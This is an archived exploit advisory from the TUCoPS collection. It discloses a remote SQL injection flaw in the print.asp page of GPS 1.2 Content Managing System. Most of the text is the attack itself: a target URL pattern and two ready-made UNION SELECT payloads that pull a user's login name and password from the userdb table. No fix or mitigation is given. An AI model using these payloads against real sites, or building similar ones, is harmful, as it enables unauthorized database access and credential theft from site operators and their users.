TUCoPS :: Web :: CMS / Portals :: c07-2109.htm

GPS 1.2 Content Managing System (print.asp) Remote SQL Injection Vulnerability
GPS 1.2 Content Managing System (print.asp) Remote SQL Injection Vulnerability
GPS 1.2 Content Managing System (print.asp) Remote SQL Injection Vulnerability



*******************************************************************************
# Title   :  GPS 1.2 Content Managing System (print.asp) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page : http://www.guox.de || http://www.planetsourcecode.com/vb/scripts/ShowCode.asp?txtCodeId=7227&lngWId=4 
# $$      :  Free

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//print.asp?id=[SQL] 

Example:

//print.asp?id=-1%20union%20select%200,0,0,Benutzername,0%20from%20userdb%20where%20ID=10
//print.asp?id=-1%20union%20select%200,0,0,Passwort,0%20from%20userdb%20where%20ID=10

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986- AOH